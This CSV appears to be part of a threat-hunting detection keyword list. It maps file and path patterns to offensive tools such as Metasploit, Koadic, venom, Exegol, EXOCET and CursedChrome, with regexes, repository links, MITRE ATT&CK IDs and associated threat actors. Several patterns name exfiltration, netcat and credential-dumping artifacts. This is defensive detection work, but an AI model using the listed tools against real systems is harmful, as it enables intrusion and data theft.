"*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","7106"
"*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","7107"
"*/exe2powershell*",".{0,1000}\/exe2powershell.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","N/A","6","2","172","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z","7108"
"*/exec_bin.c*",".{0,1000}\/exec_bin\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7109"
"*/exec_diskshadow.py*",".{0,1000}\/exec_diskshadow\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7110"
"*/exec_dll.c*",".{0,1000}\/exec_dll\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7111"
"*/exec_ftp.py*",".{0,1000}\/exec_ftp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7112"
"*/exec_pcalua.py*",".{0,1000}\/exec_pcalua\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7113"
"*/exec_psexec*",".{0,1000}\/exec_psexec.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","7114"
"*/exec_psh.c*",".{0,1000}\/exec_psh\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7115"
"*/exec_shdocvw.py*",".{0,1000}\/exec_shdocvw\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7116"
"*/exec_wmi*",".{0,1000}\/exec_wmi.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","7117"
"*/exec0.py*",".{0,1000}\/exec0\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7118"
"*/Executable_Files.git*",".{0,1000}\/Executable_Files\.git.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","7119"
"*/execute_shellcode.exe*",".{0,1000}\/execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","7120"
"*/execute-api.eu-central-1.amazonaws.com/catspin_deployed*",".{0,1000}\/execute\-api\.eu\-central\-1\.amazonaws\.com\/catspin_deployed.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","7121"
"*/ExecuteCommand_x64_Release.exe*",".{0,1000}\/ExecuteCommand_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","7122"
"*/execve_hijack*",".{0,1000}\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","7123"
"*/exegol.py*",".{0,1000}\/exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7124"
"*/exegol_user_sources.list*",".{0,1000}\/exegol_user_sources\.list.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7125"
"*/exegol-docker-build/*",".{0,1000}\/exegol\-docker\-build\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7126"
"*/Exegol-history/*",".{0,1000}\/Exegol\-history\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7127"
"*/Exegol-images-*.zip*",".{0,1000}\/Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7128"
"*/Exegol-images.git*",".{0,1000}\/Exegol\-images\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7129"
"*/ExeStager/*",".{0,1000}\/ExeStager\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","7130"
"*/exetotext.ps1*",".{0,1000}\/exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","7131"
"*/exfilGui.ps1*",".{0,1000}\/exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","7132"
"*/exfiltrate.exe*",".{0,1000}\/exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","7133"
"*/exocet.elf*",".{0,1000}\/exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","7134"
"*/exocet.exe*",".{0,1000}\/exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","7135"
"*/EXOCET-AV-Evasion.git*",".{0,1000}\/EXOCET\-AV\-Evasion\.git.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","7136"
"*/expl/expl.go*",".{0,1000}\/expl\/expl\.go.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","N/A","4","326","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z","7137"
"*/exploit.cron.sh*",".{0,1000}\/exploit\.cron\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7138"
"*/exploit.dll*",".{0,1000}\/exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7139"
"*/exploit.exe*",".{0,1000}\/exploit\.exe.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","7140"
"*/exploit.ldpreload.sh*",".{0,1000}\/exploit\.ldpreload\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7141"
"*/exploit.pbj*",".{0,1000}\/exploit\.pbj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7142"
"*/exploit/linux/*",".{0,1000}\/exploit\/linux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7143"
"*/exploit/nc.exe*",".{0,1000}\/exploit\/nc\.exe.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7144"
"*/exploit/remote/*",".{0,1000}\/exploit\/remote\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7145"
"*/exploit/windows/*",".{0,1000}\/exploit\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7146"
"*/exploit_orw.py*",".{0,1000}\/exploit_orw\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","7147"
"*/exploit_suggester.py*",".{0,1000}\/exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","7148"
"*/exported_credentials.csv*",".{0,1000}\/exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","#linux","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","7149"
"*/exports_function_hid.txt*",".{0,1000}\/exports_function_hid\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","7150"
"*/extension_injection.sh*",".{0,1000}\/extension_injection\.sh.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","7153"
"*/extensions/kiwi/kiwi.rb*",".{0,1000}\/extensions\/kiwi\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7154"
"*/ExtensionSpoof.exe*",".{0,1000}\/ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","7155"
"*/ExtensionSpoofer.git*",".{0,1000}\/ExtensionSpoofer\.git.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","7156"
